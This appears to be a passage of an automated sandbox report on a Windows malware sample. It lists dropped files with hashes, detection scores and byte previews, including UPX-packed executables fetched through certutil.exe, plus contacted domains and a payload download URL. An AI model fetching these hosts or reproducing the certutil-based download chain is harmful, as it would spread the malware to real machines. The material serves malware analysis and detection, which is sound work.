SHA-256: 802B61F6C41910DC9342DB2C16C931722529DA8B008D14123D3DEFCAE29484DD
SHA-512: 602CB155FF580922DE09264E679ECFE29016454809D36B73504347CD05E2C58645A3D0C1A2E5EDE49152B35C5BB9B60E3E45511D6DFDF279039147589C71FD09
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........K.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_L.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.806339457340596
Encrypted: false
MD5: E27FDB6477D3919C253435F27C9F8627
SHA1: 53C66BF3A87F611F7BDCDFA06A0904D59FEC8FE1
SHA-256: 9FE20B026B84E71E92A5A5ED0B54063F28C6211DF39F347D0BADE87D4E77BDBF
SHA-512: 984059A33CCAD5193C774C541D097CB72AC28F5CA41DC6A34C57D8CE911475FE8179D878D3617A1F3E4249C64C6D9EC159CC66E6B8514F4CCF4924EF40DE6AB9
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........L.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_M.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8090548800102484
Encrypted: false
MD5: 9262E8951D00DD0C682F9ACDF8FFD2EE
SHA1: 3BAB200214281E46E9653D0D927A0CC04588FE4C
SHA-256: A729EAFFA3FA864B6BF6814994FA4D3B2E63C5365B40490EB858CD44BD098CCF
SHA-512: 163BB42ED4F2A52EB11559F6FC7AFCC5B24935267D611A055DB1C71B5D086AB95FD15F6A5772EDF5AC1B8CFDFEDF748111DE3D4DC0FD9F3AD5AE1BACA7FE6B82
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........M.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_N.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 198B21D41A4406D33AEE2FC4B5EC63E2
SHA1: 8C64BB545D1FC87D272928D9A655A5556290123A
SHA-256: 659518BB55F1C67FECE48E51E0931EEC2938909354E26C39185079B44F81B5CC
SHA-512: 2628E8BEF47CFA428CAC3F8330A7F577192F70F8C9FE71FA6F47377DF25B7A35E8ED57040DC7D86A31F0E4F77CF5E05BA3285A31C64315A0740C35F85EE136BD
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........N.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_O.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: FF5D147F73D448E3DAFAB5CCDF42E7A9
SHA1: C7FD4C857A9D9E5DD2FFB2C2719B5B18AFCC6C20
SHA-256: 762B4AA976AD0B1BD0A7733E9004BF05E1FD0220E918462870FC033ADC7E113D
SHA-512: A992AE04BBBDBDE1D62D5B3D2515064F776E2E061EFFEAFA43315B670D11D463086248634A566F76B9CBDB257F1105B8EAAA4D58F484E191691C749EDC71A204
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........O.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_P.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8032648063611956
Encrypted: false
MD5: 5693BA4532491DB73BC63882C0030431
SHA1: 9766D313374AD5BEA9ED9FB2A09EC7C070AF256E
SHA-256: 4A2C45D879ABD67B0BFFF4DECB8940DC63CE72E4558DFA536B18C8751E7DC6F0
SHA-512: 213587F2F9E6218D874CC68953BD5E925946E066FF4D0615061A349D2BB91C0D28F19E8BCC19435BF1AA1C95C612E3485E6C523AA6FB2363659440BAC09256B8
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........P.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Q.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 6894AADED7EE80FE8C5219516D00B31F
SHA1: EAD35204149EE8DFA58958B5D2CB163070550EA2
SHA-256: 111F84171BE589592BB24D703C3D651E886F7DE419FA3C1AD61425C8163FD207
SHA-512: 90B7665E09554E26FBA794F97C3E46363A3511F9FA5D438B6DDEC905EAB2493F6D1A08F3C9A29D1FAFA06AAF2E4378E2CC14101F2B78341CF2E8A343F20048A6
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........Q.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_R.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 85DD38FD6FED65B649EA17BC745C1BEB
SHA1: 68742429FB3C5959439FA46BB2DF487BF9566103
SHA-256: 3204F0143A2C8842F26A0732DF797D1A54A23E7998903062FE9D763C417E4D69
SHA-512: 59A010CA8B50FD316357C84743BCC7B525677DE376448ABF68D82F191A819D379FE6492FF092594F2A2E8D3CE2E23BCA8FA29B938D0D686881D54AE7C51E2A79
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........R.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_S.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8090548800102484
Encrypted: false
MD5: 764F62436E973E7855356A1E64C3FAE5
SHA1: DB35DE551C409ADD0896F3CF091EFCDFCAE167FA
SHA-256: 73B87B180D30F04CC4BA83D41E12D073BDB62D9AD9130DF5D784F98098D20F92
SHA-512: 13898FA6F1271E3798F5F5943D686ABF75A0206475ED7E68F97E13C265F50097705E62B28E4BA6537EC8DB3D9DBF7D9A2DD61E1BDB9057057CF09288CC8F1FF5
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........S.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_T.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: E9D4CFAE3C56B40CF5758743778307C6
SHA1: F4BEA6D7FF1CA26194E205ECBB3741D0975A18ED
SHA-256: 80C64F45A233D379221BE4E7B01AFB61244C19AB2B26B76CC72D4B694734E8FC
SHA-512: 66154E1D424326EDAF69CC0079B3A0ECCFEAB90935A1D11E19C8E5E7259135286E39FFE7EF4A1AA27CE59C11E30D8AB03CE8294D13F18DB9F13D6777D8073EB1
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........T.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_U.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: E28A46264870A35CF06F2B798F770F2D
SHA1: 3FD7C6E923DC63294853E6FCA0AC02101A3786EB
SHA-256: F4D6C03D9D64CB25A5BF14E23F25D35652D890A8C5F3D1B82D9D2DEA638DAD0A
SHA-512: 63DFC6EA564FDD4C675354BE5433B697BB60E6BA5B28C2673FFBD49FC02129F73DD51B4D8EC02DEB575A130CE7EEA0C573A407D10694F145BC8C9FABC3324224
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........U.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_V.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: A8576FA76A7B5CB76620436000BFA3AA
SHA1: BD01A08CEA2CF0F6243A4089B2C4C85FB9CCC529
SHA-256: 1E2E27EBF40A38CCC008DCF8C39A5B6DDCECDB97CA253780467778196227E3EF
SHA-512: 37ADFA7F9F6E8C802C2452EB00243D24D7983DA072900771AF57F0D0562DC3B3541D57AF30E78AF14103A28E92494DCDF770EA6545C221FEF71A61AA2C745625
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........V.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_W.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: B14D6F788920C6A554FF70B0A1BE95A5
SHA1: 6EB5F7B2FA96B9C7D70B70C221A21BB8F46590CB
SHA-256: AF15AE9ACF48284AA88182D56E1E7FEE1DEC638FCBFCF9B7E7413756A4D2857D
SHA-512: F74D87448422D09145272C40D883FF4CA8507D52D75AE79918B0CBD1B4092FACA1793E04017E6AEE8971A33716DDC8627616D3735122F2FEC513231888E3B670
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........W.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_X.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: 518381EF94EF92C159998DBBE5A598BD
SHA1: FD44E4D5E71C096B9A43492A068910421C13100E
SHA-256: 3F335E6630B2F7DCF68E5E4A9A5BEDFE17FF054AF9A26CED01D11B85C4B22B91
SHA-512: 83B1EA18537C76662BE30F9B0EF893A89B5148D1E22C03FAF98FA128470AE149AFFCC09CBB2E031C4007C6BBDADBA117ABB1FF8E6295EBD5E893D627826BD680
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........X.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Y.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: FF27F3942A805A0EF80B27C4526F0829
SHA1: A4BA760D56E62C4C1E81E2DE08F655609F4995C3
SHA-256: C4C6B752C01A4C835A19F1BD69729B9D88402EEB68BE66E26C9D2440EBCCCB9C
SHA-512: 9D17E4A8FEC119C43CBFF123653C44CCD5131AA1A9AFB84E407BCB890A725E60F827C1ED1FB069CDC5F0178CBCE22B0397EFEA385AE02037DCF7526724ADC7A3
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........Y.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\5c2a55da8\usbprohub\FlashPlayer_Z.lnk
Process: C:\Windows\5c2a55da8\usbprohub\ouousbpro.exe
File Type: MS Windows shortcut, Item id list present, ctime=Sun Dec 31 23:06:32 1600, mtime=Sun Dec 31 23:06:32 1600, atime=Sun Dec 31 23:06:32 1600, length=0, window=
Size (bytes): 278
Entropy (8bit): 2.8162491246145653
Encrypted: false
MD5: D27BF068B2968FB2B5D6975FCAA91390
SHA1: B1092656EBF537CB89CD16486B31FCDB2A92DCAB
SHA-256: BA5D989B90476054FDAD3754BA98AB39EC4BA0D9E712372993E0938C88BCF632
SHA-512: DA4B040CE9FE92F81E9A1E02574926CF385EE45C2926A7424DAD8DB3FC336DE8B3E2EC06766567595323CF4A0636E3BB13358159B6087F48FB90D582429DF16D
Malicious: false
Preview: L..................F.............................................................. .!.:i.....+00..............j..........Z.:.\.F.l.a.s.h.P.l.a.y.e.r.C.P.L.A.p.p...c.p.l...F.l.a.s.h. .P.l.a.y.e.r...M.a.n.a.g.e. .F.l.a.s.h. .P.l.a.y.e.r. .S.e.t.t.i.n.g.s.........................
C:\Windows\SysWOW64\ycemck.exe
Process: C:\WebKitSdk\2.25.14\qwr4rt.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows
Size (bytes): 73728
Entropy (8bit): 5.192189717439081
Encrypted: false
MD5: EABDC54C61088B769E9AF917AA6B05A4
SHA1: 14EE316DB299DF521B9EB37603D83F6750C1F1E6
SHA-256: 51E880F62A34CF8C49B343EFF2F94F75FB8060EDEA4F3B29E2230DC120D4D38F
SHA-512: 1BE88D2EDF5AD16B7F3DDFA08323A4A30C576C8A1528B179149713801D1A567A592DC8E36664D23DD95222ED614BD8BACC1AEC5E29A2240766F411FFF74BD997
Malicious: true
Antivirus: Avira, Detection: 100%; virustotal, Detection: 79%
Joe Sandbox View: 9 related samples, Detection: malicious for all (7 unnamed, 2 named download.exe)
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!m.\e...e...e.......d.......c.......d.......d.......n.......g...S*..f...S*..f...e...n.......l.......d...Riche...................PE..L....dY.................0...........5.......@....@.......................... ..............................................HU..x........'...........................................................................@[email protected]....).......0.................. ..`.rdata.......@... ...@..............@[email protected].......`.......`[email protected]....'.......0..................@..@................................................................................................................................................................................................................................................................................................................................................
C:\Windows\System32\drivers\etc\hosts
Process: C:\Windows\cc3d3243\b158ac7.exe
File Type: ASCII text, with CRLF line terminators
Size (bytes): 822
Entropy (8bit): 4.496194958534843
Encrypted: false
MD5: 44B5974CAB4A544EE9DF159CEBBA553F
SHA1: 2ADA6F1ABC516C916E4B9170F096EB4536B8D039
SHA-256: 0BAE62CA504D9D90B6181194F9858F7C770E816E7EE1C15428B40AF63C818721
SHA-512: 7B39D171C014BBA0539576F1612751B6951E5102D9B4BC46721F93159CE28E3FFD7D21473951EEFAEA1B4A84E0A976FB3231A38BB057BABB245FE02D786BCB1D
Malicious: true
Preview: # copyright (c) 1993-2009 microsoft corp...#..# this is a sample hosts file used by microsoft tcp/ip for windows...#..# this file contains the mappings of ip addresses to host names. each..# entry should be kept on an individual line. the ip address should..# be placed in the first column followed by the corresponding host name...# the ip address and the host name should be separated by at least one..# space...#..# additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# for example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within dns itself...#.127.0.0.1 localhost..#.::1 localhost
C:\Windows\Temp\sqlisrv.exe
Process: C:\Windows\SysWOW64\certutil.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Avira, Detection: 100%; Joe Sandbox ML, Detection: 100%; virustotal, Detection: 74%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
C:\Windows\cc3d3243\b158ac7.exe
Process: C:\WebKitSdk\2.25.14\sqlisrv.exe
File Type: PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
Size (bytes): 4672000
Entropy (8bit): 7.82218228744185
Encrypted: false
MD5: 1328C9CC50BD324399B4A83CA043BE6E
SHA1: E4D3D2C3D65EA42606C6FA99BF796FBDE3CB16A3
SHA-256: 33F1D4D720D031615F5DB0462702E1B1DEE991FCFFFE5C17D7E3E1060DC95FA7
SHA-512: C6167DD7416DA0D42541A76884D533F5C5F45B21FC479FFEEBB44106141B8A1940D21B83A99E87C763B7267F0D7871213A467A933BC01B0C547EB3FCFE93E4F2
Malicious: true
Antivirus: Avira, Detection: 100%; Joe Sandbox ML, Detection: 100%; virustotal, Detection: 74%
Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......:.3.~.].~.].~.]...Q.{.]...V.w.]...W.x.]...S.R.].(.N.R.].....|.].~.\...]...N.c.].H.W...].H.V...]...V...]...W.e.].~.].*.]...[...].Rich~.].................PE..L......\.................PG..........._.......`...@.......................... `...............................................`.|...................................................................................................................UPX0....................................UPX1.....PG......BG.................@...UPX2..........`......FG.............@......................................................................................................................................................................................................................................................................................................................................................3.94.UPX!....
\Device\ConDrv
Process: C:\Windows\5c2a55da8\Coolmaster\GogoleUpadte.exe
File Type: ASCII text, with CRLF, CR line terminators
Size (bytes): 10528
Entropy (8bit): 4.311543004413748
Encrypted: false
MD5: A66AD9C43AE7763A50F87C9058B5B0C1
SHA1: BE246856E1BA7645BF1531C3C72467036DA1FA10
SHA-256: A472726FEA59B0AE9A0B4C64CFA4F7CC52B0DD54C2F156EDAAD0A9C94F3EED54
SHA-512: 369BF96BDE0E45AF7BCE380FB3A37A1ABFA8A4432CA206F472D3CFF7C93A60713B36A63B17619CCB85C49A916B6F78833385A8A2FACA2BBACDBA59A173B3149F
Malicious: false
Preview: Fuck Man !....0 IP Scanned.Taking 0 Threads .0 IP Scanned.Taking 1 Threads .0 IP Scanned.Taking 2 Threads .0 IP Scanned.Taking 3 Threads .0 IP Scanned.Taking 4 Threads .0 IP Scanned.Taking 5 Threads .0 IP Scanned.Taking 6 Threads .0 IP Scanned.Taking 7 Threads .0 IP Scanned.Taking 8 Threads .0 IP Scanned.Taking 9 Threads .0 IP Scanned.Taking 10 Threads .0 IP Scanned.Taking 11 Threads .0 IP Scanned.Taking 12 Threads .0 IP Scanned.Taking 13 Threads .0 IP Scanned.Taking 14 Threads .0 IP Scanned.Taking 15 Threads .0 IP Scanned.Taking 16 Threads .0 IP Scanned.Taking 17 Threads .0 IP Scanned.Taking 18 Threads .0 IP Scanned.Taking 19 Threads .0 IP Scanned.Taking 20 Threads .0 IP Scanned.Taking 21 Threads .0 IP Scanned.Taking 22 Threads .0 IP Scanned.Taking 23 Threads .0 IP Scanned.Taking 24 Threads .0 IP Scanned.Taking 25 Threads .0 IP Scanned.Taking 26 Threads .0 IP Scanned.Taking 27 Threads .0 IP Scanned.Taking 28 Threads .0 IP Scanned.Taking 29 Threads .0 IP Scanned.Taking 30 Threads .0 IP
Domains and IPs
Contacted Domains
Name | IP | Active | Malicious | Antivirus Detection | Reputation
2019.ip138.com | 117.25.157.119 | true | false | - | high
upa1.hognoob.se | 172.104.161.101 | true | false | - | high
upa2.hognoob.se | 172.105.237.113 | true | false | - | high
pxx.hognoob.se | 23.106.122.2 | true | true | - | unknown
q1a.hognoob.se | 23.106.122.2 | true | false | - | high
uio.hognoob.se | 195.128.126.120 | true | false | - | high
fid.hognoob.se | 45.67.14.164 | true | false | - | high
haq.hognoob.se | 195.128.124.140 | true | false | 6%, virustotal | unknown
Contacted URLs
Name | Malicious | Antivirus Detection | Reputation
uio.hognoob.se:63145/cfg.ini | false | - | high
fid.hognoob.se/sqlisrv.exe | true | 19%, virustotal; Avira URL Cloud: safe | unknown
URLs from Memory and Binaries
Name | Source | Malicious | Antivirus Detection | Reputation
fid.hognoob.se/sqlisrv.exeC: | certutil.exe, 0000000A.00000002.5515216968.00000000034D0000.00000004.sdmp, certutil.exe, 0000000A.00000002.5515380973.00000000034F0000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
repository.certum.pl/ctnca.cer09 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
repository.certum.pl/cscasha2.cer0 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
uio.hognoob.se:63145/cfg.inihttp://uio.heroherohero.info:63145/cfg.inihognoob | sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | false | Avira URL Cloud: safe | unknown
crl.certum.pl/ctnca.crl0k | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
www.openssl.org/V | sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | false | - | high
https://ifconfig.me/ | sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
schemas.xmlsoap.org/soap/envelope/ | sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | false | - | high
www.sysinternals.com | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
truehttp://fid.hognoob.se/download.exeoffpxi.hognoob.se:35791pxx.hognoob.se:357891.updateIME | sqlisrv.exe, 00000004.00000002.5101425693.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000B.00000002.5202663261.0000000000401000.00000040.sdmp, b158ac7.exe, 0000000C.00000002.6527504547.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | true | Avira URL Cloud: safe | low
https://www.certum.pl/CPS0 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
crl.certum.pl/cscasha2.crl0q | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
bea.com/2004/06/soap/workarea/ | sqlisrv.exe, 0000001B.00000002.5578674251.0000000000401000.00000040.sdmp | false | - | high
cscasha2.ocsp-certum.com04 | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000B.00000001.5183737893.000000000058C000.00000080.sdmp, b158ac7.exe, 0000000C.00000001.5206506082.0000000000401000.00000040.sdmp, sqlisrv.exe, 0000001B.00000001.5573571405.000000000058C000.00000080.sdmp | false | - | high
u2. | sqlisrv.exe, 00000004.00000001.5091079042.000000000058C000.00000080.sdmp, certutil.exe, 0000000A.00000003.5487030738.0000000005784000.00000004.sdmp | false | Avira URL Cloud: safe | unknown
